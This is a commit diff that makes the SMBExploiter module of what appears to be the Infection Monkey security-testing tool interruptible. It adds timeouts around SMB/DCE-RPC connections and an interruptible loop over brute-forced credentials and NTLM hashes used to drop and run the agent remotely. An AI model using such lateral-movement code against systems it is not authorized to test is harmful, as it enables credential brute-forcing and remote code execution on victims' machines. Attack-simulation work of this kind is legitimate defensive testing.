Agent: Make SMBExploiter interruptible

2022-03-21 14:11:21 -04:00 · 2022-03-21 14:11:21 -04:00 · ed817feaf2
parent 2c7920c95a
commit ed817feaf2
1 changed files with 12 additions and 7 deletions
--- a/monkey/infection_monkey/exploit/smbexec.py
+++ b/monkey/infection_monkey/exploit/smbexec.py
@ -3,6 +3,7 @@ from logging import getLogger
 from impacket.dcerpc.v5 import scmr, transport
 from impacket.dcerpc.v5.scmr import DCERPCSessionError

+from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
 from common.utils.attack_utils import ScanStatus, UsageEnum
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_agent_dest_path
@ -14,6 +15,7 @@ from infection_monkey.utils.brute_force import (
    get_credential_string,
 )
 from infection_monkey.utils.commands import build_monkey_commandline
+from infection_monkey.utils.threading import interruptable_iter

 logger = getLogger(__name__)

@ -33,7 +35,7 @@ class SMBExploiter(HostExploiter):
        dest_path = get_agent_dest_path(self.host, self.options)
        creds = generate_brute_force_combinations(self.options["credentials"])

-        for user, password, lm_hash, ntlm_hash in creds:
+        for user, password, lm_hash, ntlm_hash in interruptable_iter(creds, self.interrupt):
            creds_for_log = get_credential_string([user, password, lm_hash, ntlm_hash])

            try:
@ -76,8 +78,12 @@ class SMBExploiter(HostExploiter):
                continue

        if not self.exploit_result.exploitation_success:
-            logger.debug("Exploiter SmbExec is giving up...")
-            self.exploit_result.error_message = "Failed to authenticate to the victim over SMB"
+            if self._is_interrupted():
+                self._set_interrupted()
+            else:
+                logger.debug("Exploiter SmbExec is giving up...")
+                self.exploit_result.error_message = "Failed to authenticate to the victim over SMB"
+
            return self.exploit_result

        # execute the remote dropper in case the path isn't final
@ -94,9 +100,10 @@ class SMBExploiter(HostExploiter):
                "monkey_path": remote_full_path
            } + build_monkey_commandline(self.host, self.current_depth - 1)

-        smb_conn = False
+        smb_conn = None
        for str_bind_format, port in SMBExploiter.KNOWN_PROTOCOLS.values():
            rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
+            rpctransport.set_connect_timeout(LONG_REQUEST_TIMEOUT)
            rpctransport.set_dport(port)
            rpctransport.setRemoteHost(self.host.ip_addr)
            if hasattr(rpctransport, "set_credentials"):
@ -116,6 +123,7 @@ class SMBExploiter(HostExploiter):

            logger.debug(f"Connected to SCM on exploited machine {self.host}, port {port}")
            smb_conn = rpctransport.get_smb_connection()
+            smb_conn.setTimeout(LONG_REQUEST_TIMEOUT)
            break

        if not smb_conn:
@ -126,9 +134,6 @@ class SMBExploiter(HostExploiter):

            return self.exploit_result

-        # TODO: We DO want to deal with timeouts
-        # We don't wanna deal with timeouts from now on.
-        smb_conn.setTimeout(100000)
        scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(scmr_rpc)
        sc_handle = resp["lpScHandle"]